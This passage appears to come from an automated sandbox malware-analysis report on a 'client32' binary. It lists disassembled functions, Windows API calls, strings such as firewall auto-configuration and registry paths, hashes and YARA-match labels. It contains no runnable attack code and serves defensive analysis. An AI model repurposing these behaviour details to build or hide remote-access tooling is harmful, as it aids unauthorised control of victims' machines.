                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                        • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                        • API String ID: 1976012330-1024648535
                                                        • Opcode ID: e29206a9896a06f922e4cf0ceb9f136b07e2850f4e50c880c62728fdaeafb3db
                                                        • Instruction ID: 63fd93a488f830275771722d5aba5e66412ef535a9f58e0bfc3bcbadc2d60674
                                                        • Opcode Fuzzy Hash: e29206a9896a06f922e4cf0ceb9f136b07e2850f4e50c880c62728fdaeafb3db
                                                        • Instruction Fuzzy Hash: 2241A0B9E04614AFDB11DFA59C88B9BFBE4FB46708F10863EE816D7244E63595008B61
                                                        Function 11108F70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 11108FC5
                                                        • CoCreateInstance.OLE32(111AC5EC,00000000,00000001,111AC5FC,00000000,?,00000000,Client,silent,00000000,00000000,?,110489EB), ref: 11108FDF
                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11109004
                                                        • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11109016
                                                        • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11109029
                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11109035
                                                        • CoUninitialize.COMBASE(00000000), ref: 111090D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                        • String ID: SHELL32.DLL$SHGetSettings
                                                        • API String ID: 4195908086-2348320231
                                                        • Opcode ID: 6d34685f4c316705df0f1abe8123d38b31d7fd1e4502876d89345956c5a31854
                                                        • Instruction ID: 81cc2272e8ad22c1156deef73db3ee6d204820a72fecb0aa9db9e7dded57e48d
                                                        • Opcode Fuzzy Hash: 6d34685f4c316705df0f1abe8123d38b31d7fd1e4502876d89345956c5a31854
                                                        • Instruction Fuzzy Hash: 9A5161B5E002099FDB00DF95C9D4AAFFBB9EF88304F118569EA19A7244E731A941CB61
                                                        Function 11134770 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11134660: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111346D0
                                                          • Part of subcall function 11134660: RegCloseKey.ADVAPI32(?), ref: 11134734
                                                        • _memset.LIBCMT ref: 111347B5
                                                        • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 111347CE
                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111347F5
                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
                                                        • FreeLibrary.KERNEL32(00000000), ref: 1113481F
                                                        • GetSystemDefaultLangID.KERNEL32 ref: 1113482A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                        • API String ID: 4251163631-545709139
                                                        • Opcode ID: def513b5bb341cc7afad5bcd91c09d54c4c598062c949e7b226e29cf6b61c9db
                                                        • Instruction ID: 437fe0f25426a0c81b88db6811d1175116249bb1d1675cf6c1db19aceed975f5
                                                        • Opcode Fuzzy Hash: def513b5bb341cc7afad5bcd91c09d54c4c598062c949e7b226e29cf6b61c9db
                                                        • Instruction Fuzzy Hash: 5C314539E502659FDB10CFB4C984B8AF7A4EB8933AF4001F9D829D3289CB344984CB91
                                                        Function 1100FF90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
                                                        • std::bad_exception::bad_exception.LIBCMT ref: 11010064
                                                        • __CxxThrowException@8.LIBCMT ref: 11010072
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010085
                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                        • String ID: bad cast
                                                        • API String ID: 2427920155-3145022300
                                                        • Opcode ID: 8f6f677ab330cd7586c2d26ea24e096535eb1e60d392ddb083f9221c613e5385
                                                        • Instruction ID: bf8c2c354690ba20c08e95df003a744cd7babc47bb895755038865195df53275
                                                        • Opcode Fuzzy Hash: 8f6f677ab330cd7586c2d26ea24e096535eb1e60d392ddb083f9221c613e5385
                                                        • Instruction Fuzzy Hash: 0C31D575E002569FCB16CF54C884B9EF7B4FB0572CF104169EC65AB688DB35AA00CB92
                                                        Function 11128750 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                          • Part of subcall function 1108F8C0: CoInitialize.OLE32(00000000), ref: 1108F8D4
                                                          • Part of subcall function 1108F8C0: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?), ref: 1108F8E7
                                                          • Part of subcall function 1108F8C0: CoCreateInstance.OLE32(?,00000000,00000001,111AC67C,?), ref: 1108F904
                                                          • Part of subcall function 1108F8C0: CoUninitialize.COMBASE ref: 1108F922
                                                        • _memset.LIBCMT ref: 111287B0
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,00000000), ref: 111287C6
                                                        • _strrchr.LIBCMT ref: 111287D5
                                                        • _free.LIBCMT ref: 11128826
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                        • String ID: *AutoICFConfig$Client$ICFConfig2 returned 0x%x
                                                        • API String ID: 3753348462-81074719
                                                        • Opcode ID: d6a938e01ba48f2098115e7c25638f1083b752ba40fe7202dab8389a74f7b7bb
                                                        • Instruction ID: efd7c66bd05c6e10d55467fd07ad58ab98d8359d2b254dc54f01deb450eb345c
                                                        • Opcode Fuzzy Hash: d6a938e01ba48f2098115e7c25638f1083b752ba40fe7202dab8389a74f7b7bb
                                                        • Instruction Fuzzy Hash: D1213879E0061966D750DB649C06FDBF7A89F4670CF404198FE08A61C0EEF1AA80CAE1
                                                        Function 11133F90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                        • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                        • API String ID: 3494822531-1878648853
                                                        • Opcode ID: 79dec2e5e86b3296e7b7cbf95b33fee3af2b2340604abb3e6bf60fc7f45b26ba
                                                        • Instruction ID: cecf8e71dd9fb6e936cb624b8a237d093ff43f0dbaa42a0567fc90792f6e72d7
                                                        • Opcode Fuzzy Hash: 79dec2e5e86b3296e7b7cbf95b33fee3af2b2340604abb3e6bf60fc7f45b26ba
                                                        • Instruction Fuzzy Hash: 3351BA3AE5461A5BDB11CB249D14BDEFBB4AF80318F0001E4DCC977288DA71AA84CBD2
                                                        Function 110FA7D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102970: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,1110371D,00000000,00000001,?,?,?,?,?,1102F49F), ref: 1110298E
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11177D16,000000FF), ref: 110FA8A3
                                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FA8EC
                                                        • std::exception::exception.LIBCMT ref: 110FA94E
                                                        • __CxxThrowException@8.LIBCMT ref: 110FA963
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                        • String ID: Advapi32.dll$Wtsapi32.dll
                                                        • API String ID: 2851125068-2390547818
                                                        • Opcode ID: 7b5a67d0d7e6fc342c5240c02ecf1f6de07eae797b0811734f0d9ddd45c46463
                                                        • Instruction ID: 76f8521da47cb9eef126f9e1764ac0a5dc6ee811a268475dced5a0fa713519db
                                                        • Opcode Fuzzy Hash: 7b5a67d0d7e6fc342c5240c02ecf1f6de07eae797b0811734f0d9ddd45c46463
                                                        • Instruction Fuzzy Hash: 0841F1B5C09B449EC761CF6A8980BDAFBE8FFA9604F00495ED5AEA3210D7787500CF65
                                                        Function 6C8115D0 Relevance: 10.6, APIs: 7, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _calloc.LIBCMT ref: 6C81160B
                                                        • GetTickCount.KERNEL32 ref: 6C81165D
                                                        • InterlockedExchange.KERNEL32(-00039134,00000000), ref: 6C811668
                                                        • _calloc.LIBCMT ref: 6C811688
                                                        • _memmove.LIBCMT ref: 6C811696
                                                        • InterlockedDecrement.KERNEL32(-0003918C), ref: 6C8116CC
                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,937B54B7), ref: 6C8116D9
                                                          • Part of subcall function 6C8110C0: wsprintfA.USER32 ref: 6C811147
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                        • String ID:
                                                        • API String ID: 3178096747-0
                                                        • Opcode ID: fed8ba477ed2ee8269c56ed533f62f5e53b792cd63b4b2c97f690568db2dc26f
                                                        • Instruction ID: 2dd805cbc3e82c774394cb6a38eed57c01178da63f2cd172c5095af0a50311a8
                                                        • Opcode Fuzzy Hash: fed8ba477ed2ee8269c56ed533f62f5e53b792cd63b4b2c97f690568db2dc26f
                                                        • Instruction Fuzzy Hash: B64171B1D04209AFDB20CFA8C944AEFB7F8AB58304F44892AE505E7640E775DA44CBE0
                                                        Function 11129720 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • AutoICFConfig, xrefs: 11129770
                                                        • DoICFConfig() OK, xrefs: 111297F6
                                                        • Client, xrefs: 11129775
                                                        • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1112980C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick
                                                        • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                        • API String ID: 536389180-1512301160
                                                        • Opcode ID: aff00621680e15bca7df80a477e2c46395d09f16941bc071ca53205ca28342e8
                                                        • Instruction ID: 786b3b8ff38a1ee801cdeddb6cd7e762267a6f84b7e4e6377bde446301b07f06
                                                        • Opcode Fuzzy Hash: aff00621680e15bca7df80a477e2c46395d09f16941bc071ca53205ca28342e8
                                                        • Instruction Fuzzy Hash: 0221C674E062FDADEF118E38AA88785FA8257403ADF54047DED1546288FBE45540CB91
                                                        Function 6C807B70 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • #16.WSOCK32(?,007C46C7,6C8119A4,00000000,00000000,6C8119A4,00000007,?,6C807C54,?,6C8119A4,00000001,00000000,-000391A4,6C8119A4), ref: 6C807BB1
                                                        Strings
                                                        • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C807B93
                                                        • ReadSocket - Error %d reading response, xrefs: 6C807BE9
                                                        • e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c, xrefs: 6C807B8E
                                                        • ReadSocket - Connection has been closed by peer, xrefs: 6C807BCF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                        • API String ID: 0-2647837471
                                                        • Opcode ID: 0d27cf2a4455b6e5b790ed44da2296d4b5b87c1b9a1ee6fe6289d00e1b3d877f
                                                        • Instruction ID: 91f4cb387d1b7520b011c73515db2cffb9fb0263c8b5624b0e9b5b6f07a5b1b8
                                                        • Opcode Fuzzy Hash: 0d27cf2a4455b6e5b790ed44da2296d4b5b87c1b9a1ee6fe6289d00e1b3d877f
                                                        • Instruction Fuzzy Hash: 210192777156046FF6209DBCFE40EA6B3D9EB94238F105C3AF90CC3B04E621E80542A0
                                                        Function 11024B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11024B66
                                                        • K32GetProcessImageFileNameA.KERNEL32(?,?,?,110FA74F,00000000,00000000,?,110F9A67,00000000,?,00000104), ref: 11024B82
                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11024B96
                                                        • SetLastError.KERNEL32(00000078,110FA74F,00000000,00000000,?,110F9A67,00000000,?,00000104), ref: 11024BB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                        • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                        • API String ID: 4186647306-532032230
                                                        • Opcode ID: 84560621c8239c997dca9898e9568f965929ea78fcfc08c59426f9e676b42ff4
